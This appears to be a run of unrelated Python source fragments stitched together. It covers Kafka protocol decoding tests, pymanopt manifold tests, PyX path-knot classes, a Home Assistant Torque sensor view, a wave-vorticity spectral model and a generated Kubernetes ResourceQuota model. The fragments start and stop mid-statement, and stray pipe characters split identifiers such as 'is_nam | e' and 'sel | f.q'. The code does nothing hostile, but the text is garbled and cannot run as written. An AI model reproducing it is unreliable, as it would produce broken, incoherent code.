Int64.encode(0), # Msg Offset
Int32.encode(18), # Msg Size
struct.pack('>i', 1474775406), # CRC
struct.pack('>bb', 0, 0), # Magic, flags
struct.pack('>i', 2), # Length of key
b'k1', # Key
struct.pack('>i', 2), # Length of value
b'v1', # Value
Int64.encode(1), # Msg Offset
struct.pack('>i', 24), # Msg Size (larger than remaining MsgSet size)
struct.pack('>i', -16383415), # CRC
struct.pack('>bb', 0, 0), # Magic, flags
struct.pack('>i', 2), # Length of key
b'k2', # Key
struct.pack('>i', 8), # Length of value
b'ar', # Value (truncated)
Int32.encode(1),
Int16.encode(0),
Int64.encode(2345),
Int32.encode(52), # MessageSet size
Int64.encode(0), # Msg Offset
Int32.encode(18), # Msg Size
struct.pack('>i', 1474775406), # CRC
struct.pack('>bb', 0, 0), # Magic, flags
struct.pack('>i', 2), # Length of key
b'k1', # Key
struct.pack('>i', 2), # Length of value
b'v1', # Value
Int64.encode(1), # Msg Offset
struct.pack('>i', 24), # Msg Size (larger than remaining MsgSet size)
struct.pack('>i', -16383415), # CRC
struct.pack('>bb', 0, 0), # Magic, flags
struct.pack('>i', 2), # Length of key
b'k2', # Key
struct.pack('>i', 8), # Length of value
b'ar', # Value (truncated)
])
resp = FetchResponse[0].decode(io.BytesIO(encoded))
assert len(resp.topics) == 1
topic, partitions = resp.topics[0]
assert topic == 'foobar'
assert len(partitions) == 2
m1 = MessageSet.decode(
partitions[0][3], bytes_to_read=len(partitions[0][3]))
assert len(m1) == 2
assert m1[1] == (None, None, PartialMessage())
def test_struct_unrecognized_kwargs():
try:
mr = MetadataRequest[0](topicz='foo')
assert False, 'Structs should not allow unrecognized kwargs'
except ValueError:
pass
def test_struct_missing_kwargs():
fr = FetchRequest[0](max_wait_time=100)
assert fr.min_bytes is None
def test_unsigned_varint_serde():
pairs = {
0: [0],
-1: [0xff, 0xff, 0xff, 0xff, 0x0f],
1: [1],
63: [0x3f],
-64: [0xc0, 0xff, 0xff, 0xff, 0x0f],
64: [0x40],
8191: [0xff, 0x3f],
-8192: [0x80, 0xc0, 0xff, 0xff, 0x0f],
8192: [0x80, 0x40],
-8193: [0xff, 0xbf, 0xff, 0xff, 0x0f],
1048575: [0xff, 0xff, 0x3f],
}
for value, expected_encoded in pairs.items():
value &= 0xffffffff
encoded = UnsignedVarInt32.encode(value)
assert encoded == b''.join(struct.pack('>B', x) for x in expected_encoded)
assert value == UnsignedVarInt32.decode(io.BytesIO(encoded))
def test_compact_data_structs():
cs = CompactString()
encoded = cs.encode(None)
assert encoded == struct.pack('B', 0)
decoded = cs.decode(io.BytesIO(encoded))
assert decoded is None
assert b'\x01' == cs.encode('')
assert '' == cs.decode(io.BytesIO(b'\x01'))
encoded = cs.encode("foobarbaz")
assert cs.decode(io.BytesIO(encoded)) == "foobarbaz"
arr = CompactArray(CompactString())
assert arr.encode(None) == b'\x00'
assert arr.decode(io.BytesIO(b'\x00')) is None
enc = arr.encode([])
assert enc == b'\x01'
assert [] == arr.decode(io.BytesIO(enc))
encoded = arr.encode(["foo", "bar", "baz", "q |
import numpy as np
from numpy import linalg as la
from numpy import testing as np_testing
from pymanopt.manifolds import FixedRankEmbedded
from .._test import TestCase
class TestFixedRankEmbeddedManifold(TestCase):
def setUp(self):
self.m = m = 10
self.n = n = 5
self.k = k = 3
self.man = FixedRankEmbedded(m, n, k)
def test_dim(self):
assert self.man.dim == (self.m + self.n - self.k) * self.k
def test_typicaldist(self):
assert self.man.dim == self.man.typicaldist
def test_dist(self):
e = self.man
a = e.rand()
x = e.randvec(a)
y = e.randvec(a)
with self.assertRaises(NotImplementedError):
e.dist(x, y)
def test_inner(self):
e = self.man
x = e.rand()
a = e.randvec(x)
b = e.randvec(x)
# First embed in the ambient space
A = x[0] @ a[1] @ x[2] + a[0] @ x[2] + x[0] @ a[2].T
B = x[0] @ b[1] @ x[2] + b[0] @ x[2] + x[0] @ b[2].T
trueinner = np.sum(A * B)
np_testing.assert_almost_equal(trueinner, e.inner(x, a, b))
def test_proj_range(self):
m = self.man
x = m.rand()
v = np.random.randn(self.m, self.n)
g = m.proj(x, v)
# Check that g is a true tangent vector
np_testing.assert_allclose(
g[0].T @ x[0], np.zeros((self.k, self.k)), atol=1e-6
)
np_testing.assert_allclose(
g[2].T @ x[2].T, np.zeros((self.k, self.k)), atol=1e-6
)
def test_proj(self):
# Verify that proj gives the closest point within the tangent space
# by displacing the result slightly and checking that this increases
# the distance.
m = self.man
x = self.man.rand()
v = np.random.randn(self.m, self.n)
g = m.proj(x, v)
# Displace g a little
g_disp = g + 0.01 * m.randvec(x)
# Return to the ambient representation
g = m.tangent2ambient(x, g)
g_disp = m.tangent2ambient(x, g_disp)
g = g[0] @ g[1] @ g[2].T
g_disp = g_disp[0] @ g_disp[1] @ g_disp[2].T
assert np.linalg.norm(g - v) < np.linalg.norm(g_disp - v)
def test_proj_tangents(self):
# Verify that proj leaves tangent vectors unchanged
e = self.man
x = e.rand()
u = e.randvec(x)
A = e.proj(x, e.tangent2ambient(x, u))
B = u
# diff = [A[k]-B[k] for k in range(len(A))]
np_testing.assert_allclose(A[0], B[0])
np_testing.assert_allclose(A[1], B[1])
np_testing.assert_allclose(A[2], B[2])
def test_norm(self):
| e = self.man
x = e.rand()
u = e.randvec(x)
np_testing.assert_almost_equal( | np.sqrt(e.inner(x, u, u)), e.norm(x, u))
def test_rand(self):
e = self.man
x = e.rand()
y = e.rand()
assert np.shape(x[0]) == (self.m, self.k)
assert np.shape(x[1]) == (self.k,)
assert np.shape(x[2]) == (self.k, self.n)
np_testing.assert_allclose(x[0].T @ x[0], np.eye(self.k), atol=1e-6)
np_testing.assert_allclose(x[2] @ x[2].T, np.eye(self.k), atol=1e-6)
assert la.norm(x[0] - y[0]) > 1e-6
assert la.norm(x[1] - y[1]) > 1e-6
assert la.norm(x[2] - y[2]) > 1e-6
def test_transp(self):
s = self.man
x = s.rand()
y = s.rand()
u = s.randvec(x)
A = s.transp(x, y, u)
B = s.proj(y, s.tangent2ambient(x, u))
diff = [A[k] - B[k] for k in range(len(A))]
np_testing.assert_almost_equal(s.norm(y, diff), 0)
def test_apply_ambient(self):
m = self.man
z = np.random.randn(self.m, self.n)
# Set u, s, v so that z = u @ s @ v.T
u, s, v = np.linalg.svd(z, full_matrices=False)
s = np.diag(s)
v = v.T
w = np.random.randn(self.n, self.n)
np_testing.assert_allclose(z @ w, m._apply_ambient(z, w))
np_testing.assert_allclose(z @ w, m._apply_ambient((u, s, v), w))
def test_apply_ambient_transpose(self):
m = self.man
z = np.random.randn(self.n, self.m)
# Set u, s, v so that z = u @ s @ v.T
u, s, v = np.linalg.svd(z, full_matrices=False)
s = np.diag(s)
v = v.T
w = np.random.randn(self.n, self.n)
np_testing.assert_allclose(z.T @ w, m._apply_ambient_transpose(z, w))
np_testing.assert_allclose(
z.T @ w, m._apply_ambient_transpose((u, s, v), w)
)
def test_tangent2ambient(self):
m = self.man
x = m.rand()
z = m.randvec(x)
z_ambient = x[0] @ z[1] @ x[2] + z[0] @ x[2] + x[0] @ z[2].T
u, s, v = m.tangent2ambient(x, z)
np_testing.assert_allclose(z_ambient, u @ s @ v.T)
def test_ehess2rhess(self):
pass
def test_retr(self):
# Test that the result is on the manifold and that for small
# tangent vectors it has little effect.
x = self.man.rand()
u = self.man.randvec(x)
y = self.man.retr(x, u)
np_testing.assert_allclose(y[0].T @ y[0], np.eye(self.k), atol=1e-6)
np_testing.assert_allclose(y[2] @ y[2].T, np.eye(self.k), atol=1e-6)
u = u * 1e-6
y = self.man.retr(x, u)
y = y[0] @ np.diag(y[1]) @ y[2]
u = self.man.tangent2ambient(x, u)
u = u[0] @ u[1] @ u[2].T
x = x[0] @ np.diag(x[1]) @ x[2]
np_testing.assert_allclose(y, x + u, atol=1e-5)
def test_egrad2rgrad(self):
# Verify that egrad2rgrad and proj are equivalent.
m = self.man
x = m.rand()
u, s, vt = x
i = np.eye(self.k)
f = 1 / (s[..., np.newaxis, :] ** 2 - s[..., :, np.newaxis] ** 2 + i)
du = np.random.randn(self.m, self.k)
ds = np.random.randn(self.k)
dvt = np.random.randn(self.k, self.n)
Up = (np.eye(self.m) - u @ u.T) @ du @ np.linalg.inv(np.diag(s))
M = (
f * (u.T @ du - du.T @ u) @ np.diag(s)
+ np.diag(s) @ f * (vt @ dvt.T - dvt @ vt.T)
+ np.diag(ds)
)
Vp = (np.eye(self.n) - vt.T @ vt) @ dvt.T @ np.linalg.inv(np.diag(s))
up, m, vp = m.egrad2rgrad(x, (du, ds, dvt))
np_testing.assert_allclose(Up, up)
np_testing.assert_allclose(M, m)
np_testing.assert_allclose(Vp, vp)
def test_randvec(self):
e = self.man
x = e.rand()
u = e.randvec(x)
# Check that u is a tangent vector
assert np.shape(u[0]) == (self.m, self.k)
assert np.shape(u[1]) == (self.k, self.k)
assert np.shape(u[2]) == (self.n, self.k)
np_testing.assert_allclose(
u[0].T @ x[0], np.zeros((self.k, self.k)), atol=1e-6
)
np_testing.assert_allclose(
u[2].T @ x[2].T, np.zeros((self.k, self.k)), atol=1e-6
)
v = e.randvec(x)
np_testing.assert_almost_equal(e.norm(x, u), 1)
assert e.norm(x, u - v) > 1e-6
|
# -*- c | oding: utf-8 -*-
""" Thermodynamic analysis for Flux-Based Analysis
.. moduleauthor:: pyTFA team
"""
from .thermo.tmodel im | port ThermoModel
|
, in pt)
_epsilon = 1e-5
def set(epsilon=None):
global _epsilon
if epsilon is not None:
_epsilon = epsilon
################################################################################
# Path knots
################################################################################
class _knot:
"""Internal knot as used in MetaPost (mp.c)"""
def __init__(self, x_pt, y_pt, ltype, lx_pt, ly_pt, rtype, rx_pt, ry_pt):
self.x_pt = x_pt
self.y_pt = y_pt
self.ltype = ltype
self.lx_pt = lx_pt
self.ly_pt = ly_pt
self.rtype = rtype
self.rx_pt = rx_pt
self.ry_pt = ry_pt
# this is a linked list:
self.next = self
def set_left_tension(self, tens):
self.ly_pt = tens
def set_right_tension(self, tens):
self.ry_pt = tens
def set_left_curl(self, curl):
self.lx_pt = curl
def set_right_curl(self, curl):
self.rx_pt = curl
set_left_given = set_left_curl
set_right_given = set_right_curl
def left_tension(self):
return self.ly_pt
def right_tension(self):
return self.ry_pt
def left_curl(self):
return self.lx_pt
def right_curl(self):
return self.rx_pt
left_given = left_curl
right_given = right_curl
def linked_len(self):
"""returns the length of a circularly linked list of knots"""
n = 1
p = self.next
while not p is self:
n += 1
p = p.next
return n
def __repr__(self):
result = ""
# left
if self.ltype == mp_endpoint:
pass
elif self.ltype == mp_explicit:
result += "{explicit %s %s}" % (self.lx_pt, self.ly_pt)
elif self.ltype == mp_given:
result += "{given %g tens %g}" % (self.lx_pt, self.ly_pt)
elif self.ltype == mp_curl:
result += "{curl %g tens %g}" % (self.lx_pt, self.ly_pt)
elif self.ltype == mp_open:
result += "{open tens %g}" % (self.ly_pt)
elif self.ltype == mp_end_cycle:
result += "{cycle tens %g}" % (self.ly_pt)
result += "(%g %g)" % (self.x_pt, self.y_pt)
# right
if self.rtype == mp_endpoint:
pass
elif self.rtype == mp_explicit:
result += "{explicit %g %g}" % (self.rx_pt, self.ry_pt)
elif self.rtype == mp_given:
result += "{given %g tens %g}" % (self.rx_pt, self.ry_pt)
elif self.rtype == mp_curl:
result += "{curl %g tens %g}" % (self.rx_pt, self.ry_pt)
elif self.rtype == mp_open:
result += "{open tens %g}" % (self.ry_pt)
elif self.rtype == mp_end_cycle:
result += "{cycle tens %g}" % (self.ry_pt)
return result
class beginknot_pt(_knot):
"""A knot which interrupts a path, or which allows to continue it with a straight line"""
def __init__(self, x_pt, y_pt, curl=1, angle=None):
if angle is None:
type, value = mp_curl, curl
else:
type, value = mp_given, angle
# tensions are modified by the adjacent curve, but default is 1
_knot.__init__(self, x_pt, y_pt, mp_endpoint, None, None, type, value, 1)
class beginknot(beginknot_pt):
def __init__(self, x, y, curl=1, angle=None):
if not (angle is None):
angle = radians(angle)
beginknot_pt.__init__(self, unit.topt(x), unit.topt(y), curl, angle)
startknot = beginknot
class endknot_pt(_knot):
"""A knot which interrupts a path, or which allows to continue it with a straight line"""
def __init__(self, x_pt, y_pt, curl=1, angle=None):
if angle is None:
type, value = mp_curl, curl
else:
type, value = mp_given, angle
# tensions are modified by the adjacent curve, but default is 1
_knot.__init__(self, x_pt, y_pt, type, value, 1, mp_endpoint, None, None)
class endknot(endknot_pt):
def __init__(self, x, y, curl=1, angle=None):
if not (angle is None):
angle = radians(angle)
endknot_pt.__init__(self, unit.topt(x), unit.topt(y), curl, angle)
class smoothknot_pt(_knot):
"""A knot with continous tangent and "mock" curvature."""
def __init__(self, x_pt, y_pt):
# tensions are modified by the adjacent curve, but default is 1
_knot.__init__(self, x_pt, y_pt, mp_open, None, 1, mp_open, None, 1)
class smoothknot(smoothknot_pt):
def __init__(self, x, y):
smoothknot_pt.__init__(self, unit.topt(x), unit.topt(y))
knot = smoothknot
class roughknot_pt(_knot):
"""A knot with noncontinous tangent."""
def __init__(self, x_pt, y_pt, lcurl=1, rcurl=None, langle=None, rangle=None):
"""Specify either the relative curvatures, or tangent angles left (l)
or right (r) of the point."""
if langle is None:
ltype, lvalue = mp_curl, lcurl
else:
ltype, lvalue = mp_given, langle
if rcurl is not None:
rtype, rvalue = mp_curl, rcurl
elif rangle is not None:
rtype, rvalue = mp_given, rangle
else:
rtype, rvalue = ltype, lvalue
# tensions are modified by the adjacent curve, but default is 1
_knot.__init__(self, x_pt, y_pt, ltype, lvalue, 1, rtype, rvalue, 1)
class roughknot(roughknot_pt):
def __init__(self, x, y, lcurl=1, rcurl=None, langle=None, rangle=None):
if langle is not None:
langle = radians(langle)
if rangle is not None:
rangle = radians(rangle)
roughknot_pt.__init__(self, unit.topt(x), unit.topt(y), lcurl, rcurl, langle, rangle)
################################################################################
# Path links
################################################################################
class _link:
def set_knots(self, left_knot, right_knot):
"""Sets the internal properties of the metapost knots"""
pass
class line(_link):
"""A straight line"""
def __init__(self, keepangles=False):
"""The option keepangles will guarantee a continuous tangent. The
curvature may become discontinuous, however"""
self.keepangles = keepangles
def set_knots(self, left_knot, right_knot):
left_knot.rtype = mp_endpoint
right_knot.ltype = mp_endpoint
left_knot.rx_pt, left_knot.ry_pt = None, None
right_knot.lx_pt, right_knot.ly_pt = None, None
if self.keepangles:
angle = atan2(right_knot.y_pt-left_knot.y_pt, right_knot.x_pt-left_knot.x_pt)
left_knot.ltype = mp_given
left_knot.set_left_given(angle)
right_knot.rtype = mp_given
right_knot.set_right_given(angle)
class controlcurve_pt(_link):
"""A cubic Bezier curve which has its control points explicity set"""
def __init__(self, lcontrol_pt, rcontrol_pt):
"""The control points at the beginnin | g (l) and the end (r) must be
coordinate pairs"""
self.lcontrol_pt = lcontrol_pt
self.rcontrol_pt = rcontrol_pt
def set_knots(self, left_knot, right_knot):
left_knot.rtype = mp_explicit
right_knot.ltype = mp_explicit
left_knot.rx_pt, left_knot.ry_pt = self.lcontrol_pt
| right_knot.lx_pt, right_knot.ly_pt = self.rcontrol_pt
class controlcurve(controlcurve_pt):
def __init__(self, lcontrol, rcontrol):
controlcurve_pt.__init__(self, (unit.topt(lcontrol[0]), unit.topt(lcontrol[1])),
(unit.topt(rcontrol[0]), unit.topt(rcontrol[1])))
class tensioncurve(_link):
"""A yet unspecified cubic Bezier curve"""
def __init__(self, ltension=1, latleast=False, rtension=None, ratleast=None):
"""The tension parameters indicate the tensions at the beginning (l)
and the end (r) of the curve. Set the parameters (l/r)atleast to True
if you want to avoid inflection points."""
if rtension is None:
rtension = ltension
if ratleast is None:
ratleast = latleast
# make sure that tension >= 0.75 |
"""Support for the Torque OBD application."""
import logging
import re
import voluptuous as vol
from homeassistant.core import callback
from homeassistant.components.http import HomeAssistantView
from homeassistant.components.sensor import PLATFORM_SCHEMA
from homeassistant.const import CONF_EMAIL, CONF_NAME
from homeassistant.helpers.entity import Entity
import homeassistant.helpers.config_validation as cv
_LOGGER = logging.getLogger(__name__)
API_PATH = "/api/torque"
DEFAULT_NAME = "vehicle"
DOMAIN = "torque"
ENTITY_NAME_FORMAT = "{0} {1}"
SENSOR_EMAIL_FIELD = "eml"
SENSOR_NAME_KEY = r"userFullName(\w+)"
SENSOR_UNIT_KEY = r"userUnit(\w+)"
SENSOR_VALUE_KEY = r"k(\w+)"
NAME_KEY = re.compile(SENSOR_NAME_KEY)
UNIT_KEY = re.compile(SENSOR_UNIT_KEY)
VALUE_KEY = re.compile(SENSOR_VALUE_KEY)
PLATFORM_SCHEMA = PLATFORM_SCHEMA.extend(
{
vol.Required(CONF_EMAIL): cv.string,
vol.Optional(CONF_NAME, default=DEFAULT_NAME): cv.string,
}
)
def convert_pid(value):
"""Convert pid from hex string to integer."""
return int(value, 16)
def setup_platform(hass, config, add_entities, discovery_info=None):
"""Set up the Torque platform."""
vehicle = config.get(CONF_NAME)
email = config.get(CONF_EMAIL)
sensors = {}
hass.http.register_view(
TorqueReceiveDataView(email, vehicle, sensors, add_entities)
)
return True
class TorqueReceiveDataView(HomeAssistantView):
"""Handle data from Torque requests."""
url = API_PATH
name = "api:torque"
def __init__(self, email, vehicle, sensors, add_entities):
"""Initialize a Torque view."""
self.email = email
self.vehicle = vehicle
self.sensors = sensors
self.add_entities = add_entities
@callback
def get(self, request):
"""Handle Torque data request."""
hass = request.app["hass"]
data = request.query
if self.email is not None and self.email != data[SENSOR_EMAIL_FIELD]:
return
names = {}
units = {}
for key in data:
is_nam | e = NAME_KEY.match(key | )
is_unit = UNIT_KEY.match(key)
is_value = VALUE_KEY.match(key)
if is_name:
pid = convert_pid(is_name.group(1))
names[pid] = data[key]
elif is_unit:
pid = convert_pid(is_unit.group(1))
units[pid] = data[key]
elif is_value:
pid = convert_pid(is_value.group(1))
if pid in self.sensors:
self.sensors[pid].async_on_update(data[key])
for pid in names:
if pid not in self.sensors:
self.sensors[pid] = TorqueSensor(
ENTITY_NAME_FORMAT.format(self.vehicle, names[pid]),
units.get(pid, None),
)
hass.async_add_job(self.add_entities, [self.sensors[pid]])
return "OK!"
class TorqueSensor(Entity):
"""Representation of a Torque sensor."""
def __init__(self, name, unit):
"""Initialize the sensor."""
self._name = name
self._unit = unit
self._state = None
@property
def name(self):
"""Return the name of the sensor."""
return self._name
@property
def unit_of_measurement(self):
"""Return the unit of measurement."""
return self._unit
@property
def state(self):
"""Return the state of the sensor."""
return self._state
@property
def icon(self):
"""Return the default icon of the sensor."""
return "mdi:car"
@callback
def async_on_update(self, value):
"""Receive an update."""
self._state = value
self.async_schedule_update_ha_state()
|
# Physical parameters specific to the Physical Problem
self.name = name
self.f0 = f0
self.sigma = sigma
self.kappa = kappa
self.meanVisc = meanVisc
self.waveVisc = waveVisc
self.meanViscOrder = meanViscOrder
self.waveViscOrder = waveViscOrder
# Initial routines
## Initialize variables and parameters specific to this problem
self._init_parameters()
self._set_linear_coeff()
self._init_time_stepper()
# Default initial condition.
soln = np.zeros_like(self.soln)
## Default vorticity initial condition: Gaussian vortex
rVortex = self.Lx/20
q0 = 0.1*self.f0 * np.exp( \
- ( (self.XX-self.Lx/2.0)**2.0 + (self.YY-self.Ly/2.0)**2.0 ) \
/ (2*rVortex**2.0) \
)
soln[:, :, 0] = q0
## Default wave initial condition: plane wave. Find closest
## plane wave that satisfies specified dispersion relation.
kExact = np.sqrt(self.alpha)*self.kappa
kApprox = 2.0*pi/self.Lx*np.round(self.Lx*kExact/(2.0*pi))
# Set initial wave velocity to 1
A00 = -self.alpha*self.f0 / (1j*self.sigma*kApprox)
A0 = A00*np.exp(1j*kApprox*self.XX)
soln[:, :, 1] = A0
self.set_physical_soln(soln)
self.update_state_variables()
# Methods - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
def describe_physics(self):
print("""
This model solves the hydrostatic wave equation and the \n
two-dimensional vorticity equation simulataneously. \n
Arbitrary-order hyperdissipation can be specified for both. \n
There are two prognostic variables: wave amplitude, and mean vorticity.
""")
def _set_linear_coeff(self):
""" Calculate the coefficient that multiplies the linear left hand
side of the equation """
# Two-dimensional turbulent part.
self.linearCoeff[:, :, 0] = self.meanVisc \
* (self.KK**2.0 + self.LL**2.0)**(self.meanViscOrder/2.0)
waveDissipation = self.waveVisc \
* (self.KK**2.0 + self.LL**2.0)**(self.waveViscOrder/2.0)
waveDispersion = self.alpha*self.kappa**2.0 - self.KK**2.0 - self.LL**2.0
self.linearCoeff[:, :, 1] = waveDissipation \
+ self.invE*1j*self.alpha*self.sigma*waveDispersion
def _calc_right_hand_side(self, soln, t):
""" Calculate the nonlinear right hand side of PDE """
# Views for clarity:
qh = soln[:, :, 0]
Ah = soln[:, :, 1]
# Physical-space PV and velocitiy components
self.q = np.real(self.ifft2(qh))
# Derivatives of A in physical space
self.Ax = self.ifft2(self.jKK*Ah)
self.Ay = self.ifft2(self.jLL*Ah)
self.Axx = -self.ifft2(self.KK**2.0*Ah)
self.Ayy = -self.ifft2(self.LL**2.0*Ah)
self.Axy = -self.ifft2(self.LL*self.KK*Ah)
self.EA = -self.ifft2( self.alpha/2.0*Ah*( \
self.KK**2.0 + self.LL**2.0 \
+ (4.0+3.0*self.alpha)*self.kappa**2.0 ))
# Calculate streamfunction
self.psih = -qh / self.divideSafeKay2
# Mean velocities
self.U = np.real(self.ifft2(-self.jLL*self.psih))
self.V = np.real(self.ifft2( self.jKK*self.psih))
# Views to clarify calculation of A's RHS
U = self.U
V = self.V
q = self.q
Ax = self.Ax
Ay = self.Ay
EA = self.EA
Axx = self.Axx
Ayy = self.Ayy
Axy = self.Axy
f0 = self.f0
sigma = self.sigma
kappa = self.kappa
# Right hand side for q
self.RHS[:, :, 0] = -self.jKK*self.fft2(U*q) \
-self.jLL*self.fft2(V*q)
# Right hand side for A, in steps:
## 1. Advection term,
self.RHS[:, :, 1] = -self.invE*( \
self.jKK*self.fft2(U*EA) + self.jLL*self.fft2(V*EA) )
## 2. Refraction term
self.RHS[:, :, 1] += -self.invE/f0*( \
self.jKK*self.fft2( q * (1j*sigma*Ax - f0*Ay) ) \
+ self.jLL*self.fft2( q * (1j*sigma*Ay + f0*Ax) ) \
)
## 3. 'Middling' difference Jacobian term.
self.RHS[:, :, 1] += self.invE*(2j*sigma/f0**2.0)*( \
self.jKK*self.fft2( V*(1j*sigma*Axy - f0*Ayy) \
- U*(1j*sigma*Ayy + f0*Axy) ) \
+ self.jLL*self.fft2( U*(1j*sigma*Axy + f0*Axx) \
- V*(1j*sigma*Axx - f0*Axy) ) \
)
self._dealias_RHS()
def _init_parameters(self):
""" Pre-allocate parameters in memory in addition to the solution """
# Frequency parameter
self.alpha = (self.sigma**2.0 - self.f0**2.0) / self.f0**2.0
# Divide-safe square wavenumber
self.divideSafeKay2 = self.KK**2.0 + self.LL**2.0
self.divideSafeKay2[0, 0] = float('Inf')
# Inversion of the operator E
E = -self.alpha/2.0 * \
( self.KK**2.0 + self.LL**2.0 + self.kappa**2.0*(4.0+3.0*self.alpha) )
self.invE = 1.0 / E
# Prognostic variables - - - - - - - - - - - - - - - - - - - - - - - -
## Vorticity and wave-field amplitude
sel | f.q = np.zeros(self.physVarShape, np.dtype('float64'))
self.A = np.zeros(self.physVarShape, np.dtype('complex128'))
# Diagnostic variables - - - - - - - - - - - - - - - - - - - - - - - -
## Streamfunction transform
self | .psih = np.zeros(self.specVarShape, np.dtype('complex128'))
## Mean and wave velocity components
self.U = np.zeros(self.physVarShape, np.dtype('float64'))
self.V = np.zeros(self.physVarShape, np.dtype('float64'))
self.u = np.zeros(self.physVarShape, np.dtype('float64'))
self.v = np.zeros(self.physVarShape, np.dtype('float64'))
## Derivatives of wave field amplitude
self.Ax = np.zeros(self.physVarShape, np.dtype('complex128'))
self.Ay = np.zeros(self.physVarShape, np.dtype('complex128'))
self.EA = np.zeros(self.physVarShape, np.dtype('complex128'))
self.Axx = np.zeros(self.physVarShape, np.dtype('complex128'))
self.Ayy = np.zeros(self.physVarShape, np.dtype('complex128'))
self.Axy = np.zeros(self.physVarShape, np.dtype('complex128'))
def update_state_variables(self):
""" Update diagnostic variables to current model state """
# Views for clarity:
qh = self.soln[:, :, 0]
Ah = self.soln[:, :, 1]
# Streamfunction
self.psih = - qh / self.divideSafeKay2
# Physical-space PV and velocity components
self.A = self.ifft2(Ah)
self.q = np.real(self.ifft2(qh))
self.U = -np.real(self.ifft2(self.jLL*self.psih))
self.V = np.real(self.ifft2(self.jKK*self.psih))
# Wave velocities
uh = -1.0/(self.alpha*self.f0)*( \
1j*self.sigma*self.jKK*Ah - self.f0*self.jLL*Ah )
vh = -1.0/(self.alpha*self.f0)*( \
1j*self.sigma*self.jLL*Ah + self.f0*self.jKK*Ah )
self.u = np.real( self.ifft2(uh) + np.conj(self.ifft2(uh)) )
self.v = np.real( self.ifft2(vh) + np.conj(self.ifft2(vh)) )
self.sp = np.sqrt(self.u**2.0 + self.v**2.0)
def set_q(self, q):
""" Set model vorticity """
self.soln[:, :, 0] = self.fft2(q)
self.soln = self._dealias_array(self.soln)
self.update_state_variables()
def plot_current_state(self):
""" Create a simple plot that shows the state of the model."""
# Figure out how to do this efficiently.
import matplotlib.pyplot as plt
self.update_state_variables()
# Initialize colorbar dictionary
colorbarProperties = {
'orientation' : 'vertical',
'shrink' : 0.8,
'extend' : 'neither',
}
self. |
# coding: utf-8
"""
Kubernetes
No description provided (generated by Swagger Codegen https://github.com/swagger-api/swagger-codegen)
OpenAPI spec version: v1.7.4
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from pprint import pformat
from six import iteritems
import re
class V1ResourceQuota(object):
"""
NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
def __init__(self, api_version=None, kind=None, metadata=None, spec=None, status=None):
"""
V1ResourceQuota - a model defined in Swagger
:param dict swaggerTypes: The key is attribute name
and the value is attribute type.
:param dict attributeMap: The key is attribute name
and the value is json key in definition.
"""
self.swagger_types = {
'api_version': 'str',
'kind': 'str',
'metadata': 'V1ObjectMeta',
'spec': 'V1ResourceQuotaSpec',
'status': 'V1ResourceQuotaStatus'
}
self.attribute_map = {
'api_version': 'apiVersion',
'kind': 'kind',
'metadata': 'metadata',
'spec': 'spec',
'status': 'status'
}
self._api_version = api_version
self._kind = kind
self._metadata = metadata
self._spec = spec
self._status = status
@property
def api_version(self):
"""
Gets the api_version of this V1ResourceQuota.
APIVersion defines the versioned schema of this representation of an object. Servers should convert recognized schemas to the latest internal value, and may reject unrecognized values. More info: https://git.k8s.io/community/contributors/devel/api-conventions.md#resources
:return: The api_version of this V1ResourceQuota.
:rtype: str
"""
return self._api_version
@api_version.setter
def api_version(self, api_version):
"""
Sets the api_version of this V1ResourceQuota.
APIVersion defines the versioned schema of this representation of an object. Servers should convert recognized schemas to the latest internal value, and may reject unrecognized values. More info: https://git.k8s.io/community/contributors/devel/api-conventions.md#resources
:param api_version: The api_version of this V1ResourceQuota.
:type: str
"""
self._api_version = api_version
@property
def kind(self):
"""
Gets the kind of this V1ResourceQuota.
Kind is a string value representing the REST resource this object represents. Servers may infer this from the endpoint the client submits requests to. Cannot be updated. In CamelCase. More info: https://git.k8s.io/community/contributors/devel/api-conventions.md#types-kinds
:return: The kind of this V1ResourceQuota.
:rtype: str
"""
return self._kind
@kind.setter
def kind(self, kind):
"""
Sets the kind of this V1ResourceQuota.
Kind is a string value representing the REST resource this object represents. Servers may infer this from the endpoint the client submits requests to. Cannot be updated. In CamelCase. More info: https://git.k8s.io/community/contributors/devel/api-conventions.md#types-kinds
:param kind: The kind of this V1ResourceQuota.
:type: str
"""
self._kind = kind
@property
def metadata(self):
"""
Gets the metadata of this V1ResourceQuota.
Standard object's metadata. More info: https://git.k8s.io/community/contributors/devel/api-conventions.md#metadata
:return: The metadata of this V1ResourceQuota.
:rtype: V1ObjectMeta
"""
return self._metadata
@metadata.setter
def metadata(self, metadata):
"""
Sets the metadata of this V1ResourceQuota.
Standard object's metadata. More info: https://git.k8s.io/community/contributors/devel/api-conventions.md#metadata
:param metadata: The metadata of this V1ResourceQuota.
:type: V1ObjectMeta
"""
self._metadata = metadata
@property
def spec(self):
"""
Gets the spec of this V1ResourceQuota.
Spec defines the desired quota. https://git.k8s.io/community/contributors/devel/api-conventions.md#spec-and-status
:return: The spec of this V1ResourceQuota.
:rtype: V1ResourceQuotaSpec
"""
return self._spec
@spec.setter
def spec(self, spec):
"""
Sets the spec of this V1ResourceQuota.
Spec defines the desired quota. https://git.k8s.io/community/contributors/devel/api-conventions.md#spec-and-status
:param spec: The spec of this V1ResourceQuota.
:type: V1ResourceQuotaSpec
"""
self._spec = spec
@property
def status(self):
"""
Gets the status of this V1ResourceQuota.
Status defines the actual enforced quota and its current usage. https://git.k8s.io/community/contributors/devel/api-conventions.md#spec-and-status
:return: The status of this V1ResourceQuota.
:rtype: V1ResourceQuotaStatus
"""
return self._status
@status.setter
def status(self, status):
"""
Sets the status of this V1ResourceQuota.
Status defines the actual enforced quota and its current usage. https://git.k8s.io/community/contributors/devel/api-conventions.md#spec-and-status
:param status: The status of this V1ResourceQuota.
:type: V1ResourceQuotaStatus
"""
self._status = status
def to_dict(self):
"""
Returns the model properties as a dict
"""
result = {}
for attr, _ in iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
| value.items()
))
else:
result[attr] = value
| return result
def to_str(self):
"""
Returns the string representation of the model
"""
return pformat(self.to_dict())
def __repr__(self):
"""
For `print` and `pprint`
"""
return self.to_str()
def __eq__(self, other):
"""
Returns true if both objects are equal
